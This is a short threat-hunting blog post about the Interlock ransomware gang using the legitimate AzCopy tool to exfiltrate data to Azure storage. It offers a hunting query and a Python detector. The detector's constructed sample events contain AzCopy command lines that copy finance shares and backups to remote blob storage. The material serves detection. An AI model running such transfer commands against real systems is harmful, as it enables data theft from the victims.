204. Interlock Ransomware Gang Abuse AzCopy for Data Exfiltration
Hello everyone!
Another legitimate tool abused by ransomware gangs - AzCopy. According to this cybersecurity advisory, the Interlock ransomware gang used the tool for data exfiltration.
The tool allows the adversary to copy files from compromised systems to remote Azure storage.
As the tool is legitimate, it's another great target for hunting, for example:
event_type: "processcreatewin"
AND
proc_file_path: "azcopy.exe"
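The same hunt as an added Python example (not from the original post or the advisory), run over constructed process-creation events. It goes one step beyond the query by also flagging a renamed binary whose command line has the shape of an AzCopy transfer to Azure Storage. The `cmdline` field name and all hosts, paths and storage account names are assumptions.

```python
import re

# Remote Azure Storage endpoints (blob, Data Lake, file shares); only the host
# is captured, so SAS tokens in the query string never reach the hunt output.
AZURE_DEST = re.compile(
    r"https://([a-z0-9]{3,24}\.(?:blob|dfs|file)\.core\.windows\.net)(?=[/?\s\"']|$)",
    re.I)
TRANSFER_VERBS = {"copy", "cp", "sync"}  # AzCopy v10 transfer subcommands

def hunt(event):
    """Return a finding for a suspicious process-creation event, else None."""
    if event.get("event_type") != "processcreatewin":
        return None
    path = event.get("proc_file_path", "")
    cmdline = event.get("cmdline", "")  # assumed field name, not from the post
    name_hit = path.lower().replace("/", "\\").rsplit("\\", 1)[-1] == "azcopy.exe"
    accounts = sorted({h.lower() for h in AZURE_DEST.findall(cmdline)})
    verbs = {tok.strip('"').lower() for tok in cmdline.split()}
    # Command-line shape of a transfer involving Azure Storage; survives renaming.
    cmd_hit = bool(accounts) and bool(verbs & TRANSFER_VERBS)
    if not (name_hit or cmd_hit):
        return None
    return {"host": event.get("host"), "image": path,
            "renamed": not name_hit, "storage_accounts": accounts}

# Constructed sample events (hosts, paths and account names are made up).
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "host": "FS01",
     "proc_file_path": r"C:\Users\Public\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Shares\Finance" '
                '"https://examplestore01.blob.core.windows.net/c1?sv=X&sig=CONSTRUCTED" --recursive'},
    {"event_type": "processcreatewin", "host": "FS02",
     "proc_file_path": r"C:\ProgramData\svchelper.exe",
     "cmdline": r"svchelper.exe sync E:\Backups "
                "https://examplestore02.blob.core.windows.net/c2?sig=CONSTRUCTED"},
    {"event_type": "processcreatewin", "host": "WS07",
     "proc_file_path": r"C:\Windows\System32\Robocopy.exe",
     "cmdline": r"robocopy C:\src D:\dst /E"},
]

def run_hunt(events):
    return [f for f in map(hunt, events) if f]

if __name__ == "__main__":
    for finding in run_hunt(SAMPLE_EVENTS):
        print(finding)
```

The `storage_accounts` values give a list of destinations to scope against proxy or firewall logs; hosts where AzCopy is used for sanctioned backups or migrations need to be baselined out first.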
Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT.
See you tomorrow!